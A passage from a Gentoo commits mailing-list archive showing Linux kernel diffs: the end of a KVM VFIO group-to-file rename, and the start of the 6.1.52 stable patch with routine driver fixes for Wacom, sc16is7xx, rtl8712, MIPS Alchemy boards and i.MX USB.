++		return kvm_vfio_file_add(dev, fd);
+ 
+ 	case KVM_DEV_VFIO_GROUP_DEL:
+ 		if (get_user(fd, argp))
+ 			return -EFAULT;
+-		return kvm_vfio_group_del(dev, fd);
++		return kvm_vfio_file_del(dev, fd);
+ 
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+ 	case KVM_DEV_VFIO_GROUP_SET_SPAPR_TCE:
+-		return kvm_vfio_group_set_spapr_tce(dev, arg);
++		return kvm_vfio_file_set_spapr_tce(dev, arg);
+ #endif
+ 	}
+ 
+@@ -309,8 +310,8 @@ static int kvm_vfio_set_attr(struct kvm_device *dev,
+ {
+ 	switch (attr->group) {
+ 	case KVM_DEV_VFIO_GROUP:
+-		return kvm_vfio_set_group(dev, attr->attr,
+-					  u64_to_user_ptr(attr->addr));
++		return kvm_vfio_set_file(dev, attr->attr,
++					 u64_to_user_ptr(attr->addr));
+ 	}
+ 
+ 	return -ENXIO;
+@@ -339,16 +340,16 @@ static int kvm_vfio_has_attr(struct kvm_device *dev,
+ static void kvm_vfio_release(struct kvm_device *dev)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg, *tmp;
++	struct kvm_vfio_file *kvf, *tmp;
+ 
+-	list_for_each_entry_safe(kvg, tmp, &kv->group_list, node) {
++	list_for_each_entry_safe(kvf, tmp, &kv->file_list, node) {
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+-		kvm_spapr_tce_release_vfio_group(dev->kvm, kvg);
++		kvm_spapr_tce_release_vfio_group(dev->kvm, kvf);
+ #endif
+-		kvm_vfio_file_set_kvm(kvg->file, NULL);
+-		fput(kvg->file);
+-		list_del(&kvg->node);
+-		kfree(kvg);
++		kvm_vfio_file_set_kvm(kvf->file, NULL);
++		fput(kvf->file);
++		list_del(&kvf->node);
++		kfree(kvf);
+ 		kvm_arch_end_assignment(dev->kvm);
+ 	}
+ 
+@@ -382,7 +383,7 @@ static int kvm_vfio_create(struct kvm_device *dev, u32 type)
+ 	if (!kv)
+ 		return -ENOMEM;
+ 
+-	INIT_LIST_HEAD(&kv->group_list);
++	INIT_LIST_HEAD(&kv->file_list);
+ 	mutex_init(&kv->lock);
+ 
+ 	dev->private = kv;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-06 22:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-06 22:16 UTC (permalink / raw
  To: gentoo-commits

commit:     ac6e318860d1a3ad84655aaa24fb455f7b092bc0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep  6 22:15:50 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep  6 22:15:50 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ac6e3188

Linux patch 6.1.52

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1051_linux-6.1.52.patch | 957 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 961 insertions(+)

diff --git a/0000_README b/0000_README
index 641d98d3..9d50d635 100644
--- a/0000_README
+++ b/0000_README
@@ -247,6 +247,10 @@ Patch:  1050_linux-6.1.51.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.51
 
+Patch:  1051_linux-6.1.52.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.52
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1051_linux-6.1.52.patch b/1051_linux-6.1.52.patch
new file mode 100644
index 00000000..11ad1175
--- /dev/null
+++ b/1051_linux-6.1.52.patch
@@ -0,0 +1,957 @@
+diff --git a/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt b/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt
+index 0fa8e3e43bf80..1a7e4bff0456f 100644
+--- a/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt
++++ b/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt
+@@ -23,6 +23,9 @@ Optional properties:
+     1 = active low.
+ - irda-mode-ports: An array that lists the indices of the port that
+ 		   should operate in IrDA mode.
++- nxp,modem-control-line-ports: An array that lists the indices of the port that
++				should have shared GPIO lines configured as
++				modem control lines.
+ 
+ Example:
+         sc16is750: sc16is750@51 {
+@@ -35,6 +38,26 @@ Example:
+                 #gpio-cells = <2>;
+         };
+ 
++	sc16is752: sc16is752@53 {
++		compatible = "nxp,sc16is752";
++		reg = <0x53>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <1>; /* Port 1 as modem control lines */
++		gpio-controller; /* Port 0 as GPIOs */
++		#gpio-cells = <2>;
++	};
++
++	sc16is752: sc16is752@54 {
++		compatible = "nxp,sc16is752";
++		reg = <0x54>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <0 1>; /* Ports 0 and 1 as modem control lines */
++	};
++
+ * spi as bus
+ 
+ Required properties:
+@@ -59,6 +82,9 @@ Optional properties:
+     1 = active low.
+ - irda-mode-ports: An array that lists the indices of the port that
+ 		   should operate in IrDA mode.
++- nxp,modem-control-line-ports: An array that lists the indices of the port that
++				should have shared GPIO lines configured as
++				modem control lines.
+ 
+ Example:
+ 	sc16is750: sc16is750@0 {
+@@ -70,3 +96,23 @@ Example:
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 	};
++
++	sc16is752: sc16is752@1 {
++		compatible = "nxp,sc16is752";
++		reg = <1>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <1>; /* Port 1 as modem control lines */
++		gpio-controller; /* Port 0 as GPIOs */
++		#gpio-cells = <2>;
++	};
++
++	sc16is752: sc16is752@2 {
++		compatible = "nxp,sc16is752";
++		reg = <2>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <0 1>; /* Ports 0 and 1 as modem control lines */
++	};
+diff --git a/Makefile b/Makefile
+index e7c344d5af156..82aaa3ae7395b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 51
++SUBLEVEL = 52
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-pxa/sharpsl_pm.c b/arch/arm/mach-pxa/sharpsl_pm.c
+index a829baf8d9226..05c0a0f6fe630 100644
+--- a/arch/arm/mach-pxa/sharpsl_pm.c
++++ b/arch/arm/mach-pxa/sharpsl_pm.c
+@@ -220,8 +220,6 @@ void sharpsl_battery_kick(void)
+ {
+ 	schedule_delayed_work(&sharpsl_bat, msecs_to_jiffies(125));
+ }
+-EXPORT_SYMBOL(sharpsl_battery_kick);
+-
+ 
+ static void sharpsl_battery_thread(struct work_struct *private_)
+ {
+diff --git a/arch/arm/mach-pxa/spitz.c b/arch/arm/mach-pxa/spitz.c
+index 9964729cd428f..937f56bbaf6c6 100644
+--- a/arch/arm/mach-pxa/spitz.c
++++ b/arch/arm/mach-pxa/spitz.c
+@@ -9,7 +9,6 @@
+  */
+ 
+ #include <linux/kernel.h>
+-#include <linux/module.h>	/* symbol_get ; symbol_put */
+ #include <linux/platform_device.h>
+ #include <linux/delay.h>
+ #include <linux/gpio_keys.h>
+@@ -510,17 +509,6 @@ static struct ads7846_platform_data spitz_ads7846_info = {
+ 	.wait_for_sync		= spitz_ads7846_wait_for_hsync,
+ };
+ 
+-static void spitz_bl_kick_battery(void)
+-{
+-	void (*kick_batt)(void);
+-
+-	kick_batt = symbol_get(sharpsl_battery_kick);
+-	if (kick_batt) {
+-		kick_batt();
+-		symbol_put(sharpsl_battery_kick);
+-	}
+-}
+-
+ static struct gpiod_lookup_table spitz_lcdcon_gpio_table = {
+ 	.dev_id = "spi2.1",
+ 	.table = {
+@@ -548,7 +536,7 @@ static struct corgi_lcd_platform_data spitz_lcdcon_info = {
+ 	.max_intensity		= 0x2f,
+ 	.default_intensity	= 0x1f,
+ 	.limit_mask		= 0x0b,
+-	.kick_battery		= spitz_bl_kick_battery,
++	.kick_battery		= sharpsl_battery_kick,
+ };
+ 
+ static struct spi_board_info spitz_spi_devices[] = {
+diff --git a/arch/mips/alchemy/devboards/db1000.c b/arch/mips/alchemy/devboards/db1000.c
+index 2c52ee27b4f25..50de86eb8784c 100644
+--- a/arch/mips/alchemy/devboards/db1000.c
++++ b/arch/mips/alchemy/devboards/db1000.c
+@@ -14,7 +14,6 @@
+ #include <linux/interrupt.h>
+ #include <linux/leds.h>
+ #include <linux/mmc/host.h>
+-#include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/spi/spi.h>
+@@ -167,12 +166,7 @@ static struct platform_device db1x00_audio_dev = {
+ 
+ static irqreturn_t db1100_mmc_cd(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-	/* link against CONFIG_MMC=m */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	mmc_cd(ptr, msecs_to_jiffies(500));
+-	symbol_put(mmc_detect_change);
+-
++	mmc_detect_change(ptr, msecs_to_jiffies(500));
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/arch/mips/alchemy/devboards/db1200.c b/arch/mips/alchemy/devboards/db1200.c
+index 1864eb935ca57..76080c71a2a7b 100644
+--- a/arch/mips/alchemy/devboards/db1200.c
++++ b/arch/mips/alchemy/devboards/db1200.c
+@@ -10,7 +10,6 @@
+ #include <linux/gpio.h>
+ #include <linux/i2c.h>
+ #include <linux/init.h>
+-#include <linux/module.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/leds.h>
+@@ -340,14 +339,7 @@ static irqreturn_t db1200_mmc_cd(int irq, void *ptr)
+ 
+ static irqreturn_t db1200_mmc_cdfn(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-
+-	/* link against CONFIG_MMC=m */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	if (mmc_cd) {
+-		mmc_cd(ptr, msecs_to_jiffies(200));
+-		symbol_put(mmc_detect_change);
+-	}
++	mmc_detect_change(ptr, msecs_to_jiffies(200));
+ 
+ 	msleep(100);	/* debounce */
+ 	if (irq == DB1200_SD0_INSERT_INT)
+@@ -431,14 +423,7 @@ static irqreturn_t pb1200_mmc1_cd(int irq, void *ptr)
+ 
+ static irqreturn_t pb1200_mmc1_cdfn(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-
+-	/* link against CONFIG_MMC=m */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	if (mmc_cd) {
+-		mmc_cd(ptr, msecs_to_jiffies(200));
+-		symbol_put(mmc_detect_change);
+-	}
++	mmc_detect_change(ptr, msecs_to_jiffies(200));
+ 
+ 	msleep(100);	/* debounce */
+ 	if (irq == PB1200_SD1_INSERT_INT)
+diff --git a/arch/mips/alchemy/devboards/db1300.c b/arch/mips/alchemy/devboards/db1300.c
+index e70e529ddd914..ff61901329c62 100644
+--- a/arch/mips/alchemy/devboards/db1300.c
++++ b/arch/mips/alchemy/devboards/db1300.c
+@@ -17,7 +17,6 @@
+ #include <linux/interrupt.h>
+ #include <linux/ata_platform.h>
+ #include <linux/mmc/host.h>
+-#include <linux/module.h>
+ #include <linux/mtd/mtd.h>
+ #include <linux/mtd/platnand.h>
+ #include <linux/platform_device.h>
+@@ -459,14 +458,7 @@ static irqreturn_t db1300_mmc_cd(int irq, void *ptr)
+ 
+ static irqreturn_t db1300_mmc_cdfn(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-
+-	/* link against CONFIG_MMC=m.  We can only be called once MMC core has
+-	 * initialized the controller, so symbol_get() should always succeed.
+-	 */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	mmc_cd(ptr, msecs_to_jiffies(200));
+-	symbol_put(mmc_detect_change);
++	mmc_detect_change(ptr, msecs_to_jiffies(200));
+ 
+ 	msleep(100);	/* debounce */
+ 	if (irq == DB1300_SD1_INSERT_INT)
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 795be33f2892d..f19d31ee37ea8 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -357,6 +357,7 @@ static void btsdio_remove(struct sdio_func *func)
+ 	if (!data)
+ 		return;
+ 
++	cancel_work_sync(&data->work);
+ 	hdev = data->hdev;
+ 
+ 	sdio_set_drvdata(func, NULL);
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index 2d674126160fe..cab11af28c231 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -756,7 +756,7 @@ svc_create_memory_pool(struct platform_device *pdev,
+ 	paddr = begin;
+ 	size = end - begin;
+ 	va = devm_memremap(dev, paddr, size, MEMREMAP_WC);
+-	if (!va) {
++	if (IS_ERR(va)) {
+ 		dev_err(dev, "fail to remap shared memory\n");
+ 		return ERR_PTR(-EINVAL);
+ 	}
+diff --git a/drivers/fsi/fsi-master-ast-cf.c b/drivers/fsi/fsi-master-ast-cf.c
+index 5f608ef8b53ca..cde281ec89d7b 100644
+--- a/drivers/fsi/fsi-master-ast-cf.c
++++ b/drivers/fsi/fsi-master-ast-cf.c
+@@ -1441,3 +1441,4 @@ static struct platform_driver fsi_master_acf = {
+ 
+ module_platform_driver(fsi_master_acf);
+ MODULE_LICENSE("GPL");
++MODULE_FIRMWARE(FW_FILE_NAME);
+diff --git a/drivers/hid/wacom.h b/drivers/hid/wacom.h
+index 4da50e19808ef..166a76c9bcad3 100644
+--- a/drivers/hid/wacom.h
++++ b/drivers/hid/wacom.h
+@@ -150,6 +150,7 @@ struct wacom_remote {
+ 		struct input_dev *input;
+ 		bool registered;
+ 		struct wacom_battery battery;
++		ktime_t active_time;
+ 	} remotes[WACOM_MAX_REMOTES];
+ };
+ 
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index aff4a21a46b6a..af163e8dfec07 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -2527,6 +2527,18 @@ fail:
+ 	return;
+ }
+ 
++static void wacom_remote_destroy_battery(struct wacom *wacom, int index)
++{
++	struct wacom_remote *remote = wacom->remote;
++
++	if (remote->remotes[index].battery.battery) {
++		devres_release_group(&wacom->hdev->dev,
++				     &remote->remotes[index].battery.bat_desc);
++		remote->remotes[index].battery.battery = NULL;
++		remote->remotes[index].active_time = 0;
++	}
++}
++
+ static void wacom_remote_destroy_one(struct wacom *wacom, unsigned int index)
+ {
+ 	struct wacom_remote *remote = wacom->remote;
+@@ -2541,9 +2553,7 @@ static void wacom_remote_destroy_one(struct wacom *wacom, unsigned int index)
+ 			remote->remotes[i].registered = false;
+ 			spin_unlock_irqrestore(&remote->remote_lock, flags);
+ 
+-			if (remote->remotes[i].battery.battery)
+-				devres_release_group(&wacom->hdev->dev,
+-						     &remote->remotes[i].battery.bat_desc);
++			wacom_remote_destroy_battery(wacom, i);
+ 
+ 			if (remote->remotes[i].group.name)
+ 				devres_release_group(&wacom->hdev->dev,
+@@ -2551,7 +2561,6 @@ static void wacom_remote_destroy_one(struct wacom *wacom, unsigned int index)
+ 
+ 			remote->remotes[i].serial = 0;
+ 			remote->remotes[i].group.name = NULL;
+-			remote->remotes[i].battery.battery = NULL;
+ 			wacom->led.groups[i].select = WACOM_STATUS_UNKNOWN;
+ 		}
+ 	}
+@@ -2636,6 +2645,9 @@ static int wacom_remote_attach_battery(struct wacom *wacom, int index)
+ 	if (remote->remotes[index].battery.battery)
+ 		return 0;
+ 
++	if (!remote->remotes[index].active_time)
++		return 0;
++
+ 	if (wacom->led.groups[index].select == WACOM_STATUS_UNKNOWN)
+ 		return 0;
+ 
+@@ -2651,6 +2663,7 @@ static void wacom_remote_work(struct work_struct *work)
+ {
+ 	struct wacom *wacom = container_of(work, struct wacom, remote_work);
+ 	struct wacom_remote *remote = wacom->remote;
++	ktime_t kt = ktime_get();
+ 	struct wacom_remote_data data;
+ 	unsigned long flags;
+ 	unsigned int count;
+@@ -2677,6 +2690,10 @@ static void wacom_remote_work(struct work_struct *work)
+ 		serial = data.remote[i].serial;
+ 		if (data.remote[i].connected) {
+ 
++			if (kt - remote->remotes[i].active_time > WACOM_REMOTE_BATTERY_TIMEOUT
++			    && remote->remotes[i].active_time != 0)
++				wacom_remote_destroy_battery(wacom, i);
++
+ 			if (remote->remotes[i].serial == serial) {
+ 				wacom_remote_attach_battery(wacom, i);
+ 				continue;
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 15cd0cabee2a9..c1270db121784 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1129,6 +1129,7 @@ static int wacom_remote_irq(struct wacom_wac *wacom_wac, size_t len)
+ 	if (index < 0 || !remote->remotes[index].registered)
+ 		goto out;
+ 
++	remote->remotes[i].active_time = ktime_get();
+ 	input = remote->remotes[index].input;
+ 
+ 	input_report_key(input, BTN_0, (data[9] & 0x01));
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index ee21bb260f22f..2e7cc5e7a0cb7 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -13,6 +13,7 @@
+ #define WACOM_NAME_MAX		64
+ #define WACOM_MAX_REMOTES	5
+ #define WACOM_STATUS_UNKNOWN	255
++#define WACOM_REMOTE_BATTERY_TIMEOUT	21000000000ll
+ 
+ /* packet length for individual models */
+ #define WACOM_PKGLEN_BBFUN	 9
+diff --git a/drivers/mmc/host/Kconfig b/drivers/mmc/host/Kconfig
+index fb1062a6394c1..9b5a2cb110b3e 100644
+--- a/drivers/mmc/host/Kconfig
++++ b/drivers/mmc/host/Kconfig
+@@ -528,11 +528,12 @@ config MMC_ALCOR
+ 	  of Alcor Micro PCI-E card reader
+ 
+ config MMC_AU1X
+-	tristate "Alchemy AU1XX0 MMC Card Interface support"
++	bool "Alchemy AU1XX0 MMC Card Interface support"
+ 	depends on MIPS_ALCHEMY
++	depends on MMC=y
+ 	help
+ 	  This selects the AMD Alchemy(R) Multimedia card interface.
+-	  If you have a Alchemy platform with a MMC slot, say Y or M here.
++	  If you have a Alchemy platform with a MMC slot, say Y here.
+ 
+ 	  If unsure, say N.
+ 
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_ptp.c b/drivers/net/ethernet/freescale/enetc/enetc_ptp.c
+index 17c097cef7d45..5243fc0310589 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_ptp.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_ptp.c
+@@ -8,7 +8,7 @@
+ #include "enetc.h"
+ 
+ int enetc_phc_index = -1;
+-EXPORT_SYMBOL(enetc_phc_index);
++EXPORT_SYMBOL_GPL(enetc_phc_index);
+ 
+ static struct ptp_clock_info enetc_ptp_caps = {
+ 	.owner		= THIS_MODULE,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 68511597599e3..f7d392fce8c28 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -465,6 +465,7 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 				    BSS_CHANGED_BEACON_ENABLED));
+ 	bool inband_disc = !!(changed & (BSS_CHANGED_UNSOL_BCAST_PROBE_RESP |
+ 					 BSS_CHANGED_FILS_DISCOVERY));
++	bool amsdu_en = wcid->amsdu;
+ 
+ 	if (vif) {
+ 		struct mt76_vif *mvif = (struct mt76_vif *)vif->drv_priv;
+@@ -524,12 +525,14 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 	txwi[4] = 0;
+ 
+ 	val = FIELD_PREP(MT_TXD5_PID, pid);
+-	if (pid >= MT_PACKET_ID_FIRST)
++	if (pid >= MT_PACKET_ID_FIRST) {
+ 		val |= MT_TXD5_TX_STATUS_HOST;
++		amsdu_en = amsdu_en && !is_mt7921(dev);
++	}
+ 
+ 	txwi[5] = cpu_to_le32(val);
+ 	txwi[6] = 0;
+-	txwi[7] = wcid->amsdu ? cpu_to_le32(MT_TXD7_HW_AMSDU) : 0;
++	txwi[7] = amsdu_en ? cpu_to_le32(MT_TXD7_HW_AMSDU) : 0;
+ 
+ 	if (is_8023)
+ 		mt76_connac2_mac_write_txwi_8023(txwi, skb, wcid);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 60fbbd1ac2f78..172ba7199485d 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -1280,7 +1280,7 @@ mt7921_set_antenna(struct ieee80211_hw *hw, u32 tx_ant, u32 rx_ant)
+ 		return -EINVAL;
+ 
+ 	if ((BIT(hweight8(tx_ant)) - 1) != tx_ant)
+-		tx_ant = BIT(ffs(tx_ant) - 1) - 1;
++		return -EINVAL;
+ 
+ 	mt7921_mutex_acquire(dev);
+ 
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index be6838c252f09..2b6d996e393e0 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -748,7 +748,7 @@ static int amd_pinconf_get(struct pinctrl_dev *pctldev,
+ 		break;
+ 
+ 	default:
+-		dev_err(&gpio_dev->pdev->dev, "Invalid config param %04x\n",
++		dev_dbg(&gpio_dev->pdev->dev, "Invalid config param %04x\n",
+ 			param);
+ 		return -ENOTSUPP;
+ 	}
+@@ -798,7 +798,7 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			break;
+ 
+ 		default:
+-			dev_err(&gpio_dev->pdev->dev,
++			dev_dbg(&gpio_dev->pdev->dev,
+ 				"Invalid config param %04x\n", param);
+ 			ret = -ENOTSUPP;
+ 		}
+diff --git a/drivers/rtc/rtc-ds1685.c b/drivers/rtc/rtc-ds1685.c
+index 5db9c737c022f..db7216f14164e 100644
+--- a/drivers/rtc/rtc-ds1685.c
++++ b/drivers/rtc/rtc-ds1685.c
+@@ -1434,7 +1434,7 @@ ds1685_rtc_poweroff(struct platform_device *pdev)
+ 		unreachable();
+ 	}
+ }
+-EXPORT_SYMBOL(ds1685_rtc_poweroff);
++EXPORT_SYMBOL_GPL(ds1685_rtc_poweroff);
+ /* ----------------------------------------------------------------------- */
+ 
+ 
+diff --git a/drivers/staging/rtl8712/os_intfs.c b/drivers/staging/rtl8712/os_intfs.c
+index 003e972051240..3ea70d042f9a0 100644
+--- a/drivers/staging/rtl8712/os_intfs.c
++++ b/drivers/staging/rtl8712/os_intfs.c
+@@ -323,6 +323,7 @@ int r8712_init_drv_sw(struct _adapter *padapter)
+ 	mp871xinit(padapter);
+ 	init_default_value(padapter);
+ 	r8712_InitSwLeds(padapter);
++	mutex_init(&padapter->mutex_start);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/staging/rtl8712/usb_intf.c b/drivers/staging/rtl8712/usb_intf.c
+index 37364d3101e21..df05213f922f4 100644
+--- a/drivers/staging/rtl8712/usb_intf.c
++++ b/drivers/staging/rtl8712/usb_intf.c
+@@ -567,7 +567,6 @@ static int r871xu_drv_init(struct usb_interface *pusb_intf,
+ 	if (rtl871x_load_fw(padapter))
+ 		goto deinit_drv_sw;
+ 	init_completion(&padapter->rx_filter_ready);
+-	mutex_init(&padapter->mutex_start);
+ 	return 0;
+ 
+ deinit_drv_sw:
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index 6f6c4e9b77435..d6f682ed15811 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -129,6 +129,7 @@ struct qcom_geni_serial_port {
+ 	u32 tx_fifo_width;
+ 	u32 rx_fifo_depth;
+ 	bool setup;
++	unsigned long clk_rate;
+ 	int (*handle_rx)(struct uart_port *uport, u32 bytes, bool drop);
+ 	unsigned int baud;
+ 	void *rx_fifo;
+@@ -1061,6 +1062,7 @@ static void qcom_geni_serial_set_termios(struct uart_port *uport,
+ 			baud * sampling_rate, clk_rate, clk_div);
+ 
+ 	uport->uartclk = clk_rate;
++	port->clk_rate = clk_rate;
+ 	dev_pm_opp_set_rate(uport->dev, clk_rate);
+ 	ser_clk_cfg = SER_CLK_EN;
+ 	ser_clk_cfg |= clk_div << CLK_DIV_SHFT;
+@@ -1330,10 +1332,13 @@ static void qcom_geni_serial_pm(struct uart_port *uport,
+ 
+ 	if (new_state == UART_PM_STATE_ON && old_state == UART_PM_STATE_OFF) {
+ 		geni_icc_enable(&port->se);
++		if (port->clk_rate)
++			dev_pm_opp_set_rate(uport->dev, port->clk_rate);
+ 		geni_se_resources_on(&port->se);
+ 	} else if (new_state == UART_PM_STATE_OFF &&
+ 			old_state == UART_PM_STATE_ON) {
+ 		geni_se_resources_off(&port->se);
++		dev_pm_opp_set_rate(uport->dev, 0);
+ 		geni_icc_disable(&port->se);
+ 	}
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 93cf5f7888172..8411a0f312db0 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -1345,9 +1345,18 @@ static int sc16is7xx_gpio_direction_output(struct gpio_chip *chip,
+ 		state |= BIT(offset);
+ 	else
+ 		state &= ~BIT(offset);
+-	sc16is7xx_port_write(port, SC16IS7XX_IOSTATE_REG, state);
++
++	/*
++	 * If we write IOSTATE first, and then IODIR, the output value is not
++	 * transferred to the corresponding I/O pin.
++	 * The datasheet states that each register bit will be transferred to
++	 * the corresponding I/O pin programmed as output when writing to
++	 * IOSTATE. Therefore, configure direction first with IODIR, and then
++	 * set value after with IOSTATE.
++	 */
+ 	sc16is7xx_port_update(port, SC16IS7XX_IODIR_REG, BIT(offset),
+ 			      BIT(offset));
++	sc16is7xx_port_write(port, SC16IS7XX_IOSTATE_REG, state);
+ 
+ 	return 0;
+ }
+@@ -1439,6 +1448,12 @@ static int sc16is7xx_probe(struct device *dev,
+ 		s->p[i].port.fifosize	= SC16IS7XX_FIFO_SIZE;
+ 		s->p[i].port.flags	= UPF_FIXED_TYPE | UPF_LOW_LATENCY;
+ 		s->p[i].port.iobase	= i;
++		/*
++		 * Use all ones as membase to make sure uart_configure_port() in
++		 * serial_core.c does not abort for SPI/I2C devices where the
++		 * membase address is not applicable.
++		 */
++		s->p[i].port.membase	= (void __iomem *)~0;
+ 		s->p[i].port.iotype	= UPIO_PORT;
+ 		s->p[i].port.uartclk	= freq;
+ 		s->p[i].port.rs485_config = sc16is7xx_config_rs485;
+diff --git a/drivers/usb/chipidea/ci_hdrc_imx.c b/drivers/usb/chipidea/ci_hdrc_imx.c
+index 60b4de0a4f76d..caa91117ba429 100644
+--- a/drivers/usb/chipidea/ci_hdrc_imx.c
++++ b/drivers/usb/chipidea/ci_hdrc_imx.c
+@@ -175,10 +175,12 @@ static struct imx_usbmisc_data *usbmisc_get_init_data(struct device *dev)
+ 	if (of_usb_get_phy_mode(np) == USBPHY_INTERFACE_MODE_ULPI)
+ 		data->ulpi = 1;
+ 
+-	of_property_read_u32(np, "samsung,picophy-pre-emp-curr-control",
+-			&data->emp_curr_control);
+-	of_property_read_u32(np, "samsung,picophy-dc-vol-level-adjust",
+-			&data->dc_vol_level_adjust);
++	if (of_property_read_u32(np, "samsung,picophy-pre-emp-curr-control",
++			&data->emp_curr_control))
++		data->emp_curr_control = -1;
++	if (of_property_read_u32(np, "samsung,picophy-dc-vol-level-adjust",
++			&data->dc_vol_level_adjust))
++		data->dc_vol_level_adjust = -1;
+ 
+ 	return data;
+ }
+diff --git a/drivers/usb/chipidea/usbmisc_imx.c b/drivers/usb/chipidea/usbmisc_imx.c
+index 2318c7906acdb..a2cb4f48c84c6 100644
+--- a/drivers/usb/chipidea/usbmisc_imx.c
++++ b/drivers/usb/chipidea/usbmisc_imx.c
+@@ -657,13 +657,15 @@ static int usbmisc_imx7d_init(struct imx_usbmisc_data *data)
+ 			usbmisc->base + MX7D_USBNC_USB_CTRL2);
+ 		/* PHY tuning for signal quality */
+ 		reg = readl(usbmisc->base + MX7D_USB_OTG_PHY_CFG1);
+-		if (data->emp_curr_control && data->emp_curr_control <=
++		if (data->emp_curr_control >= 0 &&
++			data->emp_curr_control <=
+ 			(TXPREEMPAMPTUNE0_MASK >> TXPREEMPAMPTUNE0_BIT)) {
+ 			reg &= ~TXPREEMPAMPTUNE0_MASK;
+ 			reg |= (data->emp_curr_control << TXPREEMPAMPTUNE0_BIT);
+ 		}
+ 
